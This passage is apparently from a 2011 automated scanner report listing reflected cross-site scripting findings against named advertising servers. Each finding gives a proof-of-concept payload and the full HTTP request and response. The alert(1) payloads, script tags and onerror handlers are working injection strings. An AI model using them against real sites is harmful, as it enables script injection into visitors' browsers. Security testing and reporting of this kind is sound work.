The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 174b2"-alert(1)-"3864f9a6960 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:59 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6884
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960");
mpck = "h
...[SNIP]...

4.107. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpjs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5874a"%3balert(1)//f4e52b4d717 was submitted in the mpjs parameter. This input was echoed as 5874a";alert(1)//f4e52b4d717 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D71643475874a"%3balert(1)//f4e52b4d717&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:07 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6800
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<script type=\"text/javascript\" src=\"http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=175237&siteID=15917119013267459&creativeID=71643475874a";alert(1)//f4e52b4d717\">
...[SNIP]...

4.108. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54bb8'%3balert(1)//3d79a42824 was submitted in the mpvc parameter. This input was echoed as 54bb8';alert(1)//3d79a42824 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f54bb8'%3balert(1)//3d79a42824 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:19 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6882
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?54bb8';alert(1)//3d79a42824http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592" target="_blank">
...[SNIP]...

4.109. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fe36"%3balert(1)//f0cdb562aed was submitted in the mpvc parameter. This input was echoed as 3fe36";alert(1)//f0cdb562aed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f3fe36"%3balert(1)//f0cdb562aed HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:17 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6886
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?3fe36";alert(1)//f0cdb562aed");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/x;240687484;0-0;0;22018236;4307-300/250;41199286/41217073/1;u=10428|||||art
...[SNIP]...

4.110. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b4693<script>alert(1)</script>358699d24a2 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J07717b4693<script>alert(1)</script>358699d24a2 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 12 May 2011 11:03:13 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 13 May 2011 11:03:13 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:13 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J07717B4693<SCRIPT>ALERT(1)</SCRIPT>358699D24A2" was not recognized.
*/

4.111. http://kona40.kontera.com/KonaGet.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc76"%3balert(1)//9f187d63db2 was submitted in the l parameter. This input was echoed as dcc76";alert(1)//9f187d63db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/dcc76"%3balert(1)//9f187d63db2&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=0&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1532

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...
uestId="113351171490846325";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/dcc76";alert(1)//9f187d63db2&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");


4.112. http://kona40.kontera.com/KonaGet.js [rId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99c70"-alert(1)-"e6f81577124 was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=099c70"-alert(1)-"e6f81577124&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1515

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...
cardresearch.com/beacon.js"}]});
teUrl='http://te10.kontera.com/ContentLink/ContentLink?publisherId=134803&layout=adlinks&sId=&cb=1305200317&creative=L&cn=us';
konaTweakMode=620822530;
konaRequestId="099c70"-alert(1)-"e6f81577124";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&dc_aff_id=");
onKonaRetur
...[SNIP]...

4.113. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Issue detail

The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload 8aecd<img%20src%3da%20onerror%3dalert(1)>a8888d3a2d5 was submitted in the vid parameter. This input was echoed as 8aecd<img src=a onerror=alert(1)>a8888d3a2d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /webrecorder/g/chimera.js?vid=null8aecd<img%20src%3da%20onerror%3dalert(1)>a8888d3a2d5 HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="null8aecd<img src=a onerror=alert(1)>a8888d3a2d5"; Expires=Fri, 11-May-2012 12:10:32 GMT
Content-Length: 63
Date: Thu, 12 May 2011 12:10:32 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='null8aecd<img src=a onerror=alert(1)>a8888d3a2d5';


4.114. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c73'%3balert(1)//a585ca03c5d was submitted in the admeld_callback parameter. This input was echoed as 89c73';alert(1)//a585ca03c5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match89c73'%3balert(1)//a585ca03c5d HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 12 May 2011 11:39:29 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 12-May-2011 11:39:09 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 765

document.write('<img width="0" height="0" src="http://tag.admeld.com/match89c73';alert(1)//a585ca03c5d?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1305632369&custom_user_segments=%2C11265%2C17154%2C49027%2C59012%2C50056%2C50185%2C17163%2C50060%2C49026%2C500
...[SNIP]...

4.115. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25886"><script>alert(1)</script>8c27d2a8f82 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=25886"><script>alert(1)</script>8c27d2a8f82&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:53 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:52 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=9215002402228905964&fpid=25886"><script>alert(1)</script>8c27d2a8f82&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.116. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f36b"><script>alert(1)</script>cf6a02d7684 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

